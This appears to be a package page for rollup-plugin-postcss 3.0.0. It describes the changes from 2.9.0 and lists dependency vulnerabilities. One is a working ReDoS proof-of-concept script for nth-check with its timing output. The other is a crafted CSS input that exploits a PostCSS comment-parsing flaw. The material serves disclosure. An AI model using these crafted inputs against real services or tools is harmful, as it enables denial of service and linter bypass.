Rollup Plugin PostCSS streamlines the integration of PostCSS into Rollup workflows, enabling developers to effortlessly leverage PostCSS's transformations and optimizations within their JavaScript bundling process. Version 3.0.0 introduces subtle yet impactful changes compared to its predecessor, version 2.9.0. While the core functionality remains consistent, a key difference lies in the updated dependency versions. Specifically, the resolve dependency is bumped from version 1.16.0 to 1.16.1. Additionally, the rollup dependency in devDependencies moves from version 1.32.1 to version 2.6.1.
This upgrade to Rollup v2 offers potential benefits, including improved performance and access to the latest features and bug fixes within the Rollup ecosystem. The change in resolve might address specific module resolution issues or introduce minor performance enhancements. Developers should also note the subtle, yet potentially impactful changes, as the file count and unpacked size have been adjusted in the newer release.
Both versions provide a seamless pathway for incorporating PostCSS features like autoprefixing, CSS Modules, and advanced transformations into Rollup-based projects. The plugin supports various CSS preprocessors like Less, Sass (node-sass), Stylus, and SugarSS, offering flexibility in styling choices. With dependencies like cssnano, it is possible to minify the final generated CSS. By using Rollup Plugin PostCSS, developers can write modern CSS and rely on Rollup to handle the bundling and optimization process. This simplifies asset management and improves the overall performance of web applications built with Rollup.
All the vulnerabilities related to the version 3.0.0 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.